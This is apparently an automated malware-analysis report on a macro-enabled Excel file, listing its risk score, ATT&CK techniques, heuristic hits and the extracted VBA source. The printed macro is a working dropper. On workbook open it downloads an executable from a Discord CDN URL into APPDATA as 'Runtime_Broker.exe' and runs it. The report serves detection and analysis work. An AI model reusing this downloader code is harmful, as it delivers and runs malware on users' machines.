MALICIOUS
98
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1105 Ingress Tool Transfer
The Workbook_Open macro in the VBA script executes a function that downloads a file from the provided URL and saves it to the user's APPDATA directory as 'Runtime_Broker.exe'. The downloaded file is then executed. This indicates a downloader or droppper functionality.
Heuristics 5
-
VBA project inside OOXML medium 3 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
URLDownloadToFile in VBA critical OLE_VBA_DOWNLOADURLDownloadToFile in VBAMatched line in script
Private Declare PtrSafe Function fDownloadUnicode Lib "urlmon" Alias "URLDownloadToFileW" (ByVal Value1 As LongLong, ByVal Value2 As LongLong, ByVal Value3 As LongLong, ByVal Value4 As LongLong, ByVal Value5 As LongLong) As LongLong Private Declare PtrSafe Function fExecuteUnicode Lib "shell32.dll" Alias "ShellExecuteW" (ByVal Value1 As LongLong, ByVal Value2 As LongLong, ByVal Value3 As LongLong, ByVal Value4 As LongLong, ByVal Value5 As LongLong, ByVal Value6 As LongLong) As LongLong -
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
Private Sub Workbook_Open() Call YourSub -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
sUrl = "https://cdn.discordapp.com/attachments/846783403826872354/846783966563926155/RuntimeBroker.exe" sPath = Environ("APPDATA") & "\Runtime_Broker.exe" Call fDownloadUnicode(0, StrPtr(sUrl), StrPtr(sPath), 0, 0) -
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL https://cdn.discordapp.com/attachments/846783403826872354/846783966563926155/RuntimeBroker.exe Referenced by macro
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 1528 bytes |
SHA-256: 575eefd8e0fd850707881088dec0996b09d463c79e2297278c9767a4043de44d |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
Private Declare PtrSafe Function fDownloadUnicode Lib "urlmon" Alias "URLDownloadToFileW" (ByVal Value1 As LongLong, ByVal Value2 As LongLong, ByVal Value3 As LongLong, ByVal Value4 As LongLong, ByVal Value5 As LongLong) As LongLong
Private Declare PtrSafe Function fExecuteUnicode Lib "shell32.dll" Alias "ShellExecuteW" (ByVal Value1 As LongLong, ByVal Value2 As LongLong, ByVal Value3 As LongLong, ByVal Value4 As LongLong, ByVal Value5 As LongLong, ByVal Value6 As LongLong) As LongLong
Private Sub Workbook_Open()
Call YourSub
End Sub
Private Sub YourSub()
Dim sUrl As String, sPath As String
sUrl = "https://cdn.discordapp.com/attachments/846783403826872354/846783966563926155/RuntimeBroker.exe"
sPath = Environ("APPDATA") & "\Runtime_Broker.exe"
Call fDownloadUnicode(0, StrPtr(sUrl), StrPtr(sPath), 0, 0)
Call fExecuteUnicode(0, StrPtr("Open"), StrPtr(sPath), 0, 0, 1)
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: xl/vbaProject.bin | 10240 bytes |
SHA-256: 5a0be406ab06f0cad16493d86958c3280f102b33d4b788658fd235f0d8bdef99 |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.